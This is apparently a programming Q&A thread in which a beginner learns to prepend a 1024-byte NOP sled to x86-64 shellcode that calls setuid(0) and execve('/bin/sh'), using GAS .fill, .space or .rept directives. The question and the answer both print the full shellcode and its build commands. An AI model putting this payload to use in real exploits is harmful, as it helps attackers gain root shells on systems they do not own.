# using nop sled in my assembly shellcode to skip 0x800 ,

Tags: assembly, x86-64, gnu-assembler

i have premitive shell code in assembly :

```
.global _start

_start: 
.intel_syntax noprefix
        nop -------> i wanna fill the memory with null bytes 0x90 , in size of 0x800
    mov rax, 0x69       ; setuid 
    mov rdi, 0
    syscall 
    
    mov rax, 0x3b       ; execve
    lea rdi, [rip+filename]
    mov rsi, 0
    mov rdx, 0
    syscall 

filename:
    .string "/bin/sh"
```

how i can fill the memory with null bytes 0x90 , in size of 0x800
something like (nop * 400 // suppose nop is 2 byts )

Comment: Try the `.fill` directive.

Comment: Normally shellcode needs to avoid `00` bytes in the machine code, so you can't just use `mov reg, imm32` with small values, or a RIP-relative address with a forward offset.  (And you shouldn't `mov reg, 0` anyway for efficiency, use xor to zero registers instead.)  But sure, if you just want to fill space with a repeated byte value, `.fill`.

Comment: thankk you fuz , in fact add 1024 --> 0x400 nop  did the job but i am wondering if there is another way to make the shellcode look more shorter actualy is more 1024 line XD , i am sure we will meet again cuz i am noob in assembly as hell : |

Comment: Yes, there is a one-line way to repeat the same byte any number of times, like fuz already told you.  See https://sourceware.org/binutils/docs/as/Fill.html in the GAS manual.

Comment: In general you can repeat a longer sequence of source lines by putting a `.rept` block around them, or even produce an incrementing sequence of values or things like that, but you don't need that here.

Answer (score 0):

thank you for all ,
after long search "took so long i wish they puted some code example , they talking like i am an expert , but that was my first assembly code XD " according the answer "it was great but without any demonstration" my final shellcode look like this

```
.global _start
_start:
.intel_syntax noprefix
.rept   1024           ; 1024 repeat time------> thats exactly what i want
.nop                   ; the instruction to repeated 1024 time
.endr                  ; let say its the end of repeat loop 
    mov rax, 0x69       ; setuid 
    mov rdi, 0
    syscall 
    
    mov rax, 0x3b       ; execve
    lea rdi, [rip+filename]
    mov rsi, 0
    mov rdx, 0
    syscall 

filename:
    .string "/bin/sh"
```

after compiling with gcc

```
gcc -nostdlib -static shellcode.s -o shellcode
```

Let's check with
`objdump -M intell -D shellcode`
look exactly what i was wondering for

Comment: I thought the GAS manual was pretty clear about `.fill`.  Plugging in the repeat, size, and value as `.fill 1024, 1, 0x90` works for me.  Or `.space 1024, 0x90`.  (https://sourceware.org/binutils/docs/as/Skip.html / https://sourceware.org/binutils/docs/as/Space.html)

Comment: i know the problem it was in me , i didnt know where to put code .fill 1024, 1, 0x90 , in the end or in the start of the code XD , the dot in .fill make me confused ,thank you

Comment: You put it where you want your NOP sled; fuz and I assumed you knew that because you showed a code block with one `nop`, so the question was just how to write a source line that assembles to many nops at that location.  Any directive that emits bytes into the output does so at the current position in the current section.  (Except `.comm` / `.lcomm` which go into the BSS, not the current section.)